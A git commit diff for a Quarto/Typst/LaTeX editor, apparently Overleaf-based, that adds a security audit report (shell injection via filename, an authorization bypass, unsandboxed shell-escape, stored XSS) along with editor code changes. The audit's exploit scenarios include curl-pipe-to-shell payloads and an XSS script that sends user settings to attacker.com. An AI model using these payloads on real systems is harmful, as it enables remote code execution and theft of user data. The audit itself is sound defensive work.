docs: add alpha-3 security audit report

Four findings: shell injection via filename (RCE on CLSI), auth bypass on publish-presentation routes, shell-escape without sandbox in prod, and stored XSS via published presentations (CSP removed on main origin).

Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>
Update issues3.png
2026-06-19 10:10:19 +00:00 · 2026-06-09 07:25:39 +00:00 · 2026-06-09 07:25:13 +00:00 · 2026-06-08 22:02:14 +00:00 · 2026-06-08 21:22:11 +00:00 · 2026-06-08 21:21:48 +00:00
38 changed files with 532 additions and 648 deletions
@@ -0,0 +1,43 @@
+/**
+ * Typst syntax highlighting diagnostics.
+ * Paste into browser dev tools console with a Typst file open.
+ */
+
+// ── Part 1: CSS token counts (no view needed) ────────────────────────────
+// If all are 0, the language mode is not being applied at all.
+console.log('=== Token CSS class counts ===')
+;['heading','comment','keyword','string','number',
+  'variableName','function','emphasis','strong'].forEach(t => {
+  const n = document.querySelectorAll('.tok-' + t).length
+  console.log(`  .tok-${t}: ${n}`)
+})
+
+// ── Part 2: Try to get the parse tree ────────────────────────────────────
+// CodeMirror 6 stores DocView on .cm-content; DocView.view = EditorView
+const content = document.querySelector('.cm-content')
+const view = content?.cmView?.view
+
+if (!view?.state) {
+  console.warn('Could not find EditorView — parse tree unavailable')
+  console.log('Keys on .cm-content:', Object.keys(content ?? {}).join(', '))
+} else {
+  console.log('\n=== Parse tree (top 600 chars) ===')
+  console.log(view.state.tree.toString().slice(0, 600))
+
+  // First heading line
+  const doc = view.state.doc
+  for (let ln = 1; ln <= Math.min(doc.lines, 25); ln++) {
+    const line = doc.line(ln)
+    if (line.text.trimStart().startsWith('=')) {
+      console.log(`\n=== Nodes on heading line ${ln}: "${line.text}" ===`)
+      view.state.tree.iterate({
+        from: line.from, to: line.to,
+        enter(node) {
+          const t = doc.sliceString(node.from, node.to)
+          console.log(`  ${node.name}: ${JSON.stringify(t.slice(0, 50))}`)
+        }
+      })
+      break
+    }
+  }
+}
@@ -0,0 +1,259 @@
+# Verso Alpha-3 Security Audit
+
+**Date:** 2026-06-19
+**Branch audited:** `main` (full codebase)
+**Method:** multi-agent automated review + manual false-positive filtering
+
+---
+
+## Summary
+
+| # | Title | Severity | Confidence |
+|---|-------|----------|------------|
+| 1 | Shell injection via filename → RCE on CLSI | **HIGH** | 9/10 |
+| 2 | Read-only collaborator can publish / unpublish / rotate tokens | **HIGH** | 9/10 |
+| 3 | LaTeX `shell-escape` enabled without sandbox in production | **HIGH** | 9/10 |
+| 4 | Published presentations served without CSP (stored XSS on origin) | **MEDIUM** | 9/10 |
+
+---
+
+## Vuln 1 — Command Injection via Filename → RCE on CLSI
+
+**Files:**
+- `services/clsi/app/js/QuartoRunner.js` (lines 102–147)
+- `services/clsi/app/js/TypstRunner.js` (lines 139–141, 399–400)
+
+**Category:** `command_injection` / `rce`
+**Severity:** HIGH | **Confidence:** 9/10
+
+### Description
+
+`renderTarget` / `mainFile` (the project's root resource path) is interpolated directly into a shell command string passed to `/bin/sh -c` without any quoting or escaping:
+
+```js
+// QuartoRunner.js ~line 102
+const baseName = renderTarget.replace(/\.[^/.]+$/, '')
+// …passed to /bin/sh -c:
+`quarto render $COMPILE_DIR/${renderTarget} 2>&1 && mv ${baseName}.pdf output.pdf`
+`; rm -rf ${baseName}.qmd ${baseName}_files`
+```
+
+```js
+// TypstRunner.js ~line 140 — double quotes do NOT prevent $() or backtick expansion
+['/bin/sh', '-c', `typst watch "${absInput}" "${absOutput}" 2>&1`]
+
+// TypstRunner.js ~line 399 — completely unquoted
+['/bin/sh', '-c', `typst compile $COMPILE_DIR/${mainFile} output.pdf 2>&1`]
+```
+
+`SafePath.isCleanFilename()` (`SafePath.mjs` lines 24–37) only blocks `/`, `\`, `*`, and control characters. Shell metacharacters — `$`, `` ` ``, `(`, `)`, `;`, `&`, `|` — all pass through unchecked. The CLSI's own `_checkPath()` only rejects `..` path traversal.
+
+### Exploit Scenario
+
+Any project collaborator renames their root file to:
+
+```
+foo$(curl https://attacker.com/shell.sh|sh).qmd
+```
+
+Triggering a compile executes the injected command unsandboxed inside the CLSI container as the host process user.
+
+### Fix
+
+Use an args array instead of `/bin/sh -c` with a concatenated string:
+
+```js
+// Instead of:
+spawn('/bin/sh', ['-c', `quarto render ${renderTarget} ...`])
+
+// Use:
+spawn('quarto', ['render', absRenderTarget, '--to', 'pdf'])
+```
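A minimal sketch of why the args-array form resists injection, assuming Node's `child_process.execFileSync` and using a child Node.js process as a stand-in for `quarto`. The names `runWithoutShell` and `hostileName` are hypothetical and not part of the CLSI code.

```javascript
const { execFileSync } = require('node:child_process')

// Hypothetical helper: run a program with an explicit argument array.
// execFileSync does not start a shell by default, so every element of
// `args` reaches the child process verbatim as one argument.
function runWithoutShell(command, args) {
  return execFileSync(command, args, { encoding: 'utf8' })
}

// A root-file name carrying shell metacharacters, as in the exploit scenario.
const hostileName = 'foo$(echo injected).qmd'

// Stand-in for `quarto render <file>`: a child Node.js process that writes
// its first argument back to stdout unchanged.
const echoed = runWithoutShell(process.execPath, [
  '-e',
  'process.stdout.write(process.argv[1])',
  hostileName,
])

// True when the child saw the literal name, i.e. nothing was expanded.
console.log(echoed === hostileName)
```

Because no shell parses the string, `$(...)` is never expanded; the child receives the filename as plain data.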
+
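+For cases where a shell string is unavoidable, single-quote the variable and escape any embedded single quotes (replace each `'` with `'\''`). Bare `'${renderTarget}'` is not enough: `isCleanFilename()` does not reject `'`, so a quote in the filename would close the quoted string and re-enable expansion. The safest fix is removing all three `/bin/sh -c templateString` invocations in favour of direct `spawn` with an explicit args array.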
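Where a shell string really cannot be avoided, the quoting could look roughly like this. It is a sketch for POSIX `sh` only, and `shellQuote` is a hypothetical helper name, not an existing function in the codebase.

```javascript
// Hypothetical helper: quote a value for use inside a POSIX shell command string.
function shellQuote(value) {
  // Inside single quotes nothing is expanded, but a single quote cannot
  // appear. Each embedded quote is therefore rewritten as '\'' which closes
  // the quoted string, emits an escaped quote, and reopens the string.
  return "'" + String(value).replace(/'/g, "'\\''") + "'"
}

// A name that would break naive '${name}' quoting.
const quoted = shellQuote("it's $(id).qmd")
console.log(quoted)
```

This is still a fallback; passing an args array avoids the quoting problem entirely.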
+
+---
+
+## Vuln 2 — Authorization Bypass: Read-Only Collaborators Can Publish / Unpublish / Rotate Tokens
+
+**File:** `services/web/app/src/router.mjs` (lines 697–710)
+
+**Category:** `authorization_bypass` / `privilege_escalation`
+**Severity:** HIGH | **Confidence:** 9/10
+
+### Description
+
+Three destructive presentation endpoints are gated on `ensureUserCanReadProject` instead of `ensureUserCanAdminProject`:
+
+```js
+webRouter.post('/project/:Project_id/publish-presentation',
+  AuthorizationMiddleware.ensureUserCanReadProject,   // ← should be ensureUserCanAdminProject
+  PublishedPresentationController.publish)
+
+webRouter.post('/project/:Project_id/publish-presentation/regenerate',
+  AuthorizationMiddleware.ensureUserCanReadProject,   // ← should be ensureUserCanAdminProject
+  PublishedPresentationController.regenerate)
+
+webRouter.delete('/project/:Project_id/publish-presentation',
+  AuthorizationMiddleware.ensureUserCanReadProject,   // ← should be ensureUserCanAdminProject
+  PublishedPresentationController.unpublish)
+```
+
+`canUserReadProject` returns `true` for the `READ_ONLY` privilege level (`AuthorizationManager.mjs` lines 260–276), which is granted to any read-only collaborator and to anonymous users holding a read-only token link. `canUserAdminProject` requires `OWNER` only.
+
+### Exploit Scenario
+
+User A shares a project read-only with User B. User B can:
+
+1. **`DELETE /publish-presentation`** — permanently take down the owner's published presentation
+2. **`POST /publish-presentation/regenerate`** — rotate the public/login/member share token, breaking all existing links
+3. **`POST /publish-presentation`** — force a recompile and overwrite the published snapshot
+
+### Fix
+
+```js
+// Change all three routes — replace:
+AuthorizationMiddleware.ensureUserCanReadProject
+// with:
+AuthorizationMiddleware.ensureUserCanAdminProject
+```
+
+One-line fix per route. This is the highest-priority fix because it requires no architectural change.
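The intended behaviour of the stricter guard can be sketched as a small Express-style middleware with a simulated request. Everything here (`PRIVILEGE`, `requireOwner`, `simulate`) is a hypothetical illustration; the real checks live in `AuthorizationMiddleware` and `AuthorizationManager`, whose internals are not reproduced.

```javascript
// Hypothetical privilege levels, for illustration only.
const PRIVILEGE = { OWNER: 'owner', READ_ONLY: 'readOnly' }

// Builds an Express-style middleware that only lets project owners through.
// `lookupPrivilege` is an assumed synchronous function (req) => level.
function requireOwner(lookupPrivilege) {
  return function (req, res, next) {
    if (lookupPrivilege(req) === PRIVILEGE.OWNER) {
      return next()
    }
    // Read-only collaborators and token-link holders stop here.
    res.statusCode = 403
    res.end()
  }
}

// Push a fake request through the guard and report what happened.
function simulate(level) {
  const res = { statusCode: 200, end() {} }
  let reachedHandler = false
  requireOwner(() => level)({}, res, () => {
    reachedHandler = true
  })
  return { reachedHandler, statusCode: res.statusCode }
}

const asOwner = simulate(PRIVILEGE.OWNER)
const asReader = simulate(PRIVILEGE.READ_ONLY)
console.log(asOwner, asReader)
```

A regression test along these lines for the three routes would catch the middleware being swapped back to a read-level check.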
+
+---
+
+## Vuln 3 — LaTeX `shell-escape` Enabled Without Sandbox in Production (RCE)
+
+**Files:**
+- `.gitea/workflows/deploy-verso-prod.yml` (lines 332–333)
+- `services/clsi/app/js/LatexRunner.js` (lines 200–202)
+- `services/clsi/app/js/CommandRunner.js` (lines 12–16)
+
+**Category:** `rce` / `insecure_configuration`
+**Severity:** HIGH | **Confidence:** 9/10
+
+### Description
+
+The production Kubernetes deployment sets `OVERLEAF_LATEX_SHELL_ESCAPE: "true"` with neither `SANDBOXED_COMPILES` nor `DOCKER_RUNNER` configured. This passes `-shell-escape` to every latexmk invocation globally, for all users, with no per-user or per-project gating:
+
+```js
+// LatexRunner.js lines 200–202
+if (Settings.clsi?.latexShellEscape) {
+  command.push('-shell-escape')   // unconditional — applies to all users/projects
+}
+```
+
+Without `DOCKER_RUNNER=true`, `CommandRunner.js` selects `LocalCommandRunner` — compiles run as the host process with full container filesystem access. The reference `docker-compose.yml` *does* configure sandboxed compiles (`SANDBOXED_COMPILES: true`, `DOCKER_RUNNER: true`); the production K8s deployment simply omits them.
+
+The compile endpoint requires only `ensureUserCanReadProject`, so any holder of a read-only share link can trigger a compile.
+
+### Exploit Scenario
+
+Any user with write access to a project (including a project they created themselves) uploads or edits a `.tex` file containing:
+
+```latex
+\immediate\write18{curl https://attacker.com/shell.sh | bash}
+```
+
+Triggering a compile executes the command unsandboxed, with access to all mounted volumes (source files, Redis socket, compile output).
+
+### Fix (two steps)
+
+**Step 1 — Short term:** Remove `OVERLEAF_LATEX_SHELL_ESCAPE: "true"` from `.gitea/workflows/deploy-verso-prod.yml`. Disable shell-escape entirely unless there is a specific, per-project need.
+
+**Step 2 — Medium term:** Add sandboxed compile configuration to the production deployment, mirroring the reference `docker-compose.yml`:
+
+```yaml
+- name: SANDBOXED_COMPILES
+  value: "true"
+- name: DOCKER_RUNNER
+  value: "true"
+```
+
+This contains the blast radius of any future compile-path vulnerability regardless of shell-escape status.
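One way to keep this misconfiguration from recurring is a fail-closed check at startup. The sketch below uses the environment variable names cited in this report, but `findUnsafeCompileConfig` is a hypothetical function and the assumption that each value is the string `"true"` when enabled comes only from the YAML shown above.

```javascript
// Hypothetical startup check: report combinations of settings that would
// run shell-escape compiles outside a sandbox.
function findUnsafeCompileConfig(env) {
  // Assumption: a setting counts as enabled only when its value is "true".
  const enabled = name => String(env[name] ?? '').toLowerCase() === 'true'

  const problems = []
  if (enabled('OVERLEAF_LATEX_SHELL_ESCAPE')) {
    if (!enabled('SANDBOXED_COMPILES')) {
      problems.push('shell-escape is enabled but SANDBOXED_COMPILES is not')
    }
    if (!enabled('DOCKER_RUNNER')) {
      problems.push('shell-escape is enabled but DOCKER_RUNNER is not')
    }
  }
  return problems
}

// The production configuration described in this finding.
const prodProblems = findUnsafeCompileConfig({
  OVERLEAF_LATEX_SHELL_ESCAPE: 'true',
})
console.log(prodProblems)
```

A service could refuse to start, or at least log loudly, whenever the returned list is non-empty.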
+
+---
+
+## Vuln 4 — Stored XSS via Published Presentations (CSP Removed on Main Origin)
+
+**File:** `services/web/app/src/Features/PublishedPresentation/PublishedPresentationController.mjs` (line 116)
+
+**Category:** `xss` / `stored`
+**Severity:** MEDIUM | **Confidence:** 9/10
+
+### Description
+
+The published-presentation handler explicitly removes the Content-Security-Policy header before serving the raw HTML output:
+
+```js
+res.removeHeader('Content-Security-Policy')  // line 116
+res.sendFile(target, ...)                     // serves output.html / index.html directly
+```
+
+The file served is the raw Quarto/reveal.js compile output — not a sanitized template. Since users control the `.qmd` source entirely, arbitrary `<script>` blocks can be embedded. The `/p/:token` routes are registered on the same `webRouter` as the main app, so scripts execute with **full same-origin privileges** against the Verso application origin.
+
+### Impact
+
+- Any visitor to a `publicToken` link has the script execute in their browser (no login required to be targeted)
+- `fetch()` calls from the same origin automatically include the session cookie; `httpOnly` only stops scripts from reading the cookie, not from sending authenticated requests
+- A script can call the `/dev/csrf` endpoint to obtain a valid CSRF token, then call any mutating POST/DELETE API endpoint as the victim (read/write projects, change email, delete account, exfiltrate documents)
+
+### Exploit Scenario
+
+1. Attacker creates a Quarto project with a slide containing:
+   ```html
+   <script>
+     fetch('/user/settings', {credentials: 'include'})
+       .then(r => r.json())
+       .then(d => fetch('https://attacker.com/?d=' + btoa(JSON.stringify(d))))
+   </script>
+   ```
+2. Compiles and publishes → obtains the `publicToken` URL
+3. Shares the link with a victim
+4. Victim visits the link → script executes on the Verso origin → authenticated API calls made on victim's behalf
+
+### Fix
+
+The correct fix is to **serve published presentations from an isolated subdomain** (e.g., `decks.verso.example.com`) with no session cookie access, so embedded scripts are origin-isolated from the main app.
+
+As a stopgap, apply a restricted CSP instead of removing it entirely:
+
+```js
+// Instead of:
+res.removeHeader('Content-Security-Policy')
+
+// Apply a presentation-specific policy:
+res.setHeader('Content-Security-Policy',
+  "default-src 'self'; script-src 'self' 'unsafe-inline'; style-src 'self' 'unsafe-inline'; connect-src 'none'")
+```
+
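+`connect-src 'none'` blocks `fetch()`, XHR, WebSocket, and `sendBeacon` exfiltration even if inline scripts run. It is only a partial mitigation: navigation and form submissions are not governed by `connect-src`, and `form-action` does not fall back to `default-src`, so origin isolation is still required.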
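Keeping the policy as structured data may make the stopgap easier to review and extend. In this sketch `buildCsp` is a hypothetical helper, and the `form-action 'none'` entry is an assumed addition that is not part of the policy proposed above; it is included because `form-action` does not inherit from `default-src`.

```javascript
// Hypothetical helper: serialize a directive map into a CSP header value.
function buildCsp(directives) {
  return Object.entries(directives)
    .map(([name, sources]) => `${name} ${sources.join(' ')}`)
    .join('; ')
}

const presentationCsp = buildCsp({
  // Directives taken from the stopgap policy in this report.
  'default-src': ["'self'"],
  'script-src': ["'self'", "'unsafe-inline'"],
  'style-src': ["'self'", "'unsafe-inline'"],
  'connect-src': ["'none'"],
  // Assumed addition: block form posts, which default-src does not cover.
  'form-action': ["'none'"],
})

console.log(presentationCsp)
```

The resulting string would be passed to `res.setHeader('Content-Security-Policy', presentationCsp)` in place of the `removeHeader` call.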
+
+---
+
+## Items Reviewed and Not Flagged
+
+| Area | Finding |
+|------|---------|
+| MongoDB queries | No raw `req.body` interpolation; Mongoose used throughout |
+| CSRF protection | `csurf` middleware applied globally; no Verso-added bypass found |
+| `dangerouslySetInnerHTML` | Only in operator-controlled footer (env-var source, not user input) |
+| `DOMPurify` usage | `labs-description.tsx` uses it correctly with a strict allowlist |
+| Hardcoded credentials | `dev.env` has weak defaults; production uses auto-generated secrets from `100_generate_secrets.sh` |
+| Open redirects | `getSafeRedirectPath` strips to pathname only; no exploitable chain found |
+| SSRF (URL agent) | Proxied through `linkedUrlProxy`; host allowlisting in place |
+| Path traversal in `serve()` | `path.resolve` + `startsWith` guard is correct |
+| Session secret | Auto-generated at init, stored in `/etc/container_environment/CRYPTO_RANDOM` |
+
+---
+
+## Recommended Fix Priority for Alpha-3
+
+| Priority | Finding | Effort |
+|----------|---------|--------|
+| 1 | **Vuln 2** — wrong auth middleware on 3 routes | ~5 min, 3-line fix |
+| 2 | **Vuln 3** — remove `shell-escape` from prod deploy | ~5 min, remove 2 lines from YAML |
+| 3 | **Vuln 1** — fix quoting in QuartoRunner + TypstRunner | ~1 hour, refactor spawn calls |
+| 4 | **Vuln 4** — XSS via presentations | Hours–days; subdomain isolation is the real fix |
+
+Vulns 1–3 are straightforward enough to fix before shipping alpha-3. Vuln 4 can be mitigated with the `connect-src 'none'` CSP header as a stopgap and tracked as a post-alpha-3 architectural item.
@@ -26,12 +26,13 @@ cypress/results/
 # Ace themes for conversion
 frontend/js/features/source-editor/themes/ace/

-# Compiled parser files (latex/bibtex are generated by webpack plugin at build time)
+# Compiled parser files
 frontend/js/features/source-editor/lezer-latex/latex.mjs
 frontend/js/features/source-editor/lezer-latex/latex.terms.mjs
 frontend/js/features/source-editor/lezer-bibtex/bibtex.mjs
 frontend/js/features/source-editor/lezer-bibtex/bibtex.terms.mjs
-# typst compiled files are committed (generated via node scripts/lezer-latex/generate.mjs)
+frontend/js/features/source-editor/lezer-typst/typst.mjs
+frontend/js/features/source-editor/lezer-typst/typst.terms.mjs

 !**/fixtures/**/*.log

@@ -1,7 +1,6 @@
 import { pipeline } from 'node:stream/promises'
 import Metrics from '@overleaf/metrics'
 import ProjectGetter from '../Project/ProjectGetter.mjs'
-import { Project } from '../../models/Project.mjs'
 import CompileManager from './CompileManager.mjs'
 import ClsiManager from './ClsiManager.mjs'
 import logger from '@overleaf/logger'
@@ -9,7 +8,6 @@ import Settings from '@overleaf/settings'
 import Errors from '../Errors/Errors.js'
 import SessionManager from '../Authentication/SessionManager.mjs'
 import { userCanInstallPython } from './PythonVenvGate.mjs'
-import TokenAccessHandler from '../TokenAccess/TokenAccessHandler.mjs'
 import { RateLimiter } from '../../infrastructure/RateLimiter.mjs'
 import Validation from '../../infrastructure/Validation.mjs'
 import Path from 'node:path'
@@ -207,8 +205,7 @@ const _CompileController = {
    // Allow building a per-project Python venv from requirements.txt only for
    // the project owner and invited collaborators — never anonymous or
    // link-sharing users.
-    const anonToken = TokenAccessHandler.getRequestToken(req, projectId)
-    options.allowPythonInstall = await userCanInstallPython(userId, projectId, anonToken)
+    options.allowPythonInstall = await userCanInstallPython(userId, projectId)

    let {
      enablePdfCaching,
@@ -303,26 +300,6 @@ const _CompileController = {
      ? getOutputFilesArchiveSpecification(projectId, userId, buildId)
      : null

-    // Persist quarto output flavor so the project-list badge can distinguish
-    // RevealJS presentations from PDF documents without needing a compile.
-    // options.compiler is not sent by the frontend, so we read the stored
-    // compiler from the DB. Done fire-and-forget so it never delays the response.
-    if (status === 'success') {
-      const isHtml = outputFiles.some(f => f.path === 'output.html')
-      ProjectGetter.promises
-        .getProject(projectId, { compiler: 1 })
-        .then(project => {
-          if (project?.compiler !== 'quarto') return
-          return Project.updateOne(
-            { _id: projectId },
-            { quartoFlavor: isHtml ? 'revealjs' : 'pdf' }
-          ).exec()
-        })
-        .catch(err =>
-          logger.warn({ err, projectId }, 'failed to update quartoFlavor')
-        )
-    }
-
    res.json({
      status,
      outputFiles,
@@ -4,12 +4,11 @@ import AuthorizationManager from '../Authorization/AuthorizationManager.mjs'

 // Whether this user may have the compiler install a project's requirements.txt
 // into a cached venv (so Quarto's Python cells can use libraries beyond the
-// bundled base set). Allowed for any user who can access the project — owner,
-// invited collaborators, token-link users, and public-project readers — since
-// the set of packages to install is already controlled by requirements.vrf
-// (writable only by project members with write access). Returns false when the
-// feature is disabled, the privilege check fails, or the user has no access.
-export async function userCanInstallPython(userId, projectId, token = null) {
+// bundled base set). Gated to the project owner + invited collaborators (any
+// role): ignorePublicAccess excludes link-sharing/public and anonymous users,
+// who fall back to the base Python interpreter. Returns false when the feature
+// is disabled or the privilege check fails.
+export async function userCanInstallPython(userId, projectId) {
  if (!Settings.enableProjectPythonVenv) {
    return false
  }
@@ -18,7 +17,8 @@ export async function userCanInstallPython(userId, projectId, token = null) {
      await AuthorizationManager.promises.getPrivilegeLevelForProject(
        userId,
        projectId,
-        token
+        null,
+        { ignorePublicAccess: true }
      )
    return Boolean(privilegeLevel)
  } catch (err) {
@@ -681,7 +681,7 @@ async function _getProjects(
  const results = await Promise.all([
    ProjectGetter.promises.findAllUsersProjects(
      userId,
-      'name lastUpdated lastUpdatedBy publicAccesLevel archived trashed owner_ref tokens compiler quartoFlavor'
+      'name lastUpdated lastUpdatedBy publicAccesLevel archived trashed owner_ref tokens compiler'
    ),
    TagsHandler.promises.getAllTags(userId),
  ])
@@ -826,7 +826,6 @@ function _formatProjectInfo(project, accessLevel, source, userId) {
    archived,
    trashed,
    compiler: project.compiler,
-    quartoFlavor: project.quartoFlavor,
  }
 }

@@ -881,7 +880,6 @@ async function _injectProjectUsers(projects) {
        : users[project.owner_ref.toString()],
    owner_ref: undefined,
    compiler: project.compiler,
-    quartoFlavor: project.quartoFlavor,
  }))
 }

@@ -38,7 +38,6 @@ export const ProjectSchema = new Schema(
    version: { type: Number }, // incremented for every change in the project structure (folders and filenames)
    publicAccesLevel: { type: String, default: 'private' },
    compiler: { type: String, default: settings.defaultLatexCompiler },
-    quartoFlavor: { type: String, enum: ['revealjs', 'pdf'] },
    spellCheckLanguage: { type: String, default: 'en' },
    deletedByExternalDataSource: { type: Boolean, default: false },
    description: { type: String, default: '' },
@@ -8,7 +8,6 @@ import { usePermissionsContext } from '@/features/ide-react/context/permissions-
 import FileTreeActionButton from './file-tree-action-button'
 import { useRailContext } from '../../ide-react/context/rail-context'
 import PythonRequirementsModal from './python-requirements-modal'
-import { useProjectSettingsContext } from '@/features/editor-left-menu/context/project-settings-context'

 export default function FileTreeActionButtons({
  fileTreeExpanded,
@@ -20,8 +19,6 @@ export default function FileTreeActionButtons({
  const { write } = usePermissionsContext()
  const { handlePaneCollapse } = useRailContext()
  const [showPythonModal, setShowPythonModal] = useState(false)
-  const { compiler } = useProjectSettingsContext()
-  const isQuarto = compiler === 'quarto'

  const {
    canCreate,
@@ -115,7 +112,7 @@ export default function FileTreeActionButtons({
              iconType="delete"
            />
          )}
-          {write && isQuarto && (
+          {write && (
            <FileTreeActionButton
              id="python-packages"
              description={t('python_packages')}
@@ -4,21 +4,12 @@ import { ProjectCompiler } from '../../../../../../../types/project-settings'
 // Map the stored compiler engine to the document format the project produces.
 // CLSI dispatches the real engine from the root file's extension, but the
 // compiler field is a faithful, cheap proxy for the project's format.
-function formatLabel(
-  compiler: ProjectCompiler | undefined,
-  quartoFlavor: 'revealjs' | 'pdf' | undefined
-): {
+function formatLabel(compiler: ProjectCompiler | undefined): {
  label: string
-  variant: 'quarto-slides' | 'quarto' | 'typst' | 'latex'
+  variant: 'quarto' | 'typst' | 'latex'
 } {
  switch (compiler) {
    case 'quarto':
-      if (quartoFlavor === 'revealjs') {
-        return { label: 'Quarto Slides', variant: 'quarto-slides' }
-      }
-      if (quartoFlavor === 'pdf') {
-        return { label: 'Quarto PDF', variant: 'quarto' }
-      }
      return { label: 'Quarto', variant: 'quarto' }
    case 'typst':
      return { label: 'Typst', variant: 'typst' }
@@ -33,7 +24,7 @@ type FormatCellProps = {
 }

 export default function FormatCell({ project }: FormatCellProps) {
-  const { label, variant } = formatLabel(project.compiler, project.quartoFlavor)
+  const { label, variant } = formatLabel(project.compiler)

  return (
    <span
@@ -46,6 +46,5 @@ export const classHighlighter = tagHighlighter([
  { tag: tags.invalid, class: 'tok-invalid' },
  { tag: tags.punctuation, class: 'tok-punctuation' },
  // additional
-  { tag: tags.attributeName, class: 'tok-attributeName' },
  { tag: tags.attributeValue, class: 'tok-attributeValue' },
 ])
@@ -203,9 +203,6 @@ const staticTheme = EditorView.theme({
    alignItems: 'center',
    fontWeight: 'normal',
  },
-  // Bold and italic markup (e.g. *strong* _emphasis_ in Typst and Markdown)
-  '.tok-strong': { fontWeight: 'bold' },
-  '.tok-emphasis': { fontStyle: 'italic' },
  '.cm-selectionLayer': {
    zIndex: -10,
  },
@@ -23,53 +23,32 @@ const LEVELS: NestingLevel[] = [
 // after it, so this stays clear of code.
 const HEADING_REGEX = /^(=+)[ \t]+(.*\S)[ \t]*$/

-// Count unescaped '$' signs on a line to track math-mode parity.
-function countDollars(text: string): number {
-  let count = 0
-  for (let i = 0; i < text.length; i++) {
-    if (text[i] === '\\') { i++; continue }
-    if (text[i] === '$') count++
-  }
-  return count
-}
-
 function computeOutline(
  state: EditorState
 ): ProjectionResult<FlatOutlineItem> {
  const items: FlatOutlineItem[] = []
-  // Track whether we are inside a multi-line display math block.
-  // Each line with an odd number of unescaped '$' toggles the flag.
-  let inMath = false

  for (let n = 1; n <= state.doc.lines; n++) {
    const line = state.doc.line(n)
-    const text = line.text
+    const match = HEADING_REGEX.exec(line.text)
+    if (!match) continue

-    // Only attempt heading detection when not inside a math block.
-    // (e.g. '= b+c$' on the second line of '$ a \n= b+c$' must be skipped.)
-    if (!inMath) {
-      const match = HEADING_REGEX.exec(text)
-      if (match) {
-        const depth = match[1].length
-        const level = LEVELS[Math.min(depth, LEVELS.length) - 1]
-        // Strip a trailing line comment, then a trailing label.
-        const title = match[2]
-          .replace(/\s*\/\/.*$/, '')
-          .replace(/\s*<[\w-]+>\s*$/, '')
-          .trim()
+    const depth = match[1].length
+    const level = LEVELS[Math.min(depth, LEVELS.length) - 1]
+    // Strip a trailing line comment, then a trailing label.
+    const title = match[2]
+      .replace(/\s*\/\/.*$/, '')
+      .replace(/\s*<[\w-]+>\s*$/, '')
+      .trim()

-        items.push({
-          line: n,
-          toLine: n,
-          title,
-          from: line.from,
-          to: line.to,
-          level,
-        } as FlatOutlineItem)
-      }
-    }
-
-    if (countDollars(text) % 2 === 1) inMath = !inMath
+    items.push({
+      line: n,
+      toLine: n,
+      title,
+      from: line.from,
+      to: line.to,
+      level,
+    } as FlatOutlineItem)
  }

  return { items, status: ProjectionStatus.Complete }
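The per-line heading logic kept by this hunk can be exercised in isolation. The sketch below copies `HEADING_REGEX` and the two title-stripping replacements from the diff; `parseHeading` and the sample lines are hypothetical, written in plain JavaScript for illustration.

```javascript
// Copied from the hunk above: "=" markers, whitespace, then a title.
const HEADING_REGEX = /^(=+)[ \t]+(.*\S)[ \t]*$/

// Hypothetical wrapper around the same steps computeOutline applies per line.
function parseHeading(lineText) {
  const match = HEADING_REGEX.exec(lineText)
  if (!match) return null
  // Strip a trailing line comment, then a trailing label.
  const title = match[2]
    .replace(/\s*\/\/.*$/, '')
    .replace(/\s*<[\w-]+>\s*$/, '')
    .trim()
  return { depth: match[1].length, title }
}

const heading = parseHeading('== Related work <sec-related> // draft')
const notHeading = parseHeading('=no space after marker')
console.log(heading, notHeading)
```

Note that with the math-parity tracking removed, a line such as `= b+c$` inside a multi-line `$ ... $` block matches the regex again and would be listed as a heading.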
@@ -14,8 +14,9 @@ import { typstDocumentOutline } from './document-outline'
 // Note on tree structure: rules starting with a lowercase letter in the grammar
 // are inline (no tree node), so their children are promoted to the parent.
 // E.g. codeArgItem, codeValue, callSuffix, codeArgList are all inline.
-// Named arg keys emit CodeArgKey (not CodeIdent) via codeIdentTokenizer,
-// so CodeArgKey appears at the same level as other codeArgItem children.
+// Therefore:
+//   - The named-argument key "CodeIdent" is a *direct* child of CodeArgs.
+//   - Positional arguments that are identifiers are wrapped in CallExpr.

 export const TypstLanguage = LRLanguage.define({
  name: 'typst',
@@ -49,13 +50,11 @@ export const TypstLanguage = LRLanguage.define({
        CodeBool: t.atom,

        // Identifiers:
-        //   CodeExpr/CodeIdent  — bare #func (no args) → function style
-        //   FuncExpr/CodeIdent  — func call with args/method (#func(...), link.with(url)) → function style
-        //   CodeArgKey          — named arg key (tokenizer pre-disambiguates on ':') → attributeName
-        //   CodeIdent           — plain variable/constant reference (e.g. 'left', 'center') → variable
-        'CodeExpr/CodeIdent': t.function(t.variableName),
-        'FuncExpr/CodeIdent': t.function(t.variableName),
-        CodeArgKey: t.attributeName,
+        //   - direct child of CallExpr → function/method name
+        //   - direct child of CodeArgs → named argument key (key: value syntax)
+        //   - everywhere else          → plain variable
+        'CallExpr/CodeIdent': t.function(t.variableName),
+        'CodeArgs/CodeIdent': t.attributeName,
        CodeIdent: t.variableName,

        // Literals in code mode
@@ -74,11 +73,8 @@ export const TypstLanguage = LRLanguage.define({
        MathContent: t.string,

        // Markup emphasis
-        'Strong/"*" Strong/StrongBody': t.strong,
-        'Emphasis/"_" Emphasis/EmphBody': t.emphasis,
-
-        // Bare URLs (https://... / http://...)
-        URL: t.string,
+        'Strong/"*" Strong/StrongText': t.strong,
+        'Emphasis/"_" Emphasis/EmphText': t.emphasis,

        // Labels (<name>) and references (@name)
        'Label/"<" Label/">" Label/LabelName': t.labelName,
@@ -101,9 +97,6 @@ const typstHighlightStyle = HighlightStyle.define([
  { tag: t.heading, fontWeight: 'bold' },
  { tag: t.strong, fontWeight: 'bold' },
  { tag: t.emphasis, fontStyle: 'italic' },
-  // Named arg keys (fill:, caption:, columns:…) — amber colour that reads
-  // well on both light and dark backgrounds, independent of theme CSS.
-  { tag: t.attributeName, color: '#c47900' },
 ])

 export const typst = () => {
@@ -8,50 +8,22 @@ import {
  RawBlockBody,
  RawBlockClose,
  RawInlineContent,
+  CodeBlockBody,
  BlockCommentBody,
  LineCommentContent,
  MathContent,
-  CodeKeyword,
-  CodeIdent,
-  CodeArgKey,
-  StrongBody,
-  EmphBody,
 } from './typst.terms.mjs'

-const BACKTICK    = 96  // `
-const SLASH       = 47  // /
-const STAR        = 42  // *
-const NEWLINE     = 10  // \n
-const EQUALS      = 61  // =
-const SPACE       = 32  //
-const TAB         =  9  // \t
-const DOLLAR      = 36  // $
+const BACKTICK  = 96  // `
+const SLASH     = 47  // /
+const STAR      = 42  // *
+const NEWLINE   = 10  // \n
+const EQUALS    = 61  // =
+const SPACE     = 32  //
+const TAB       =  9  // \t
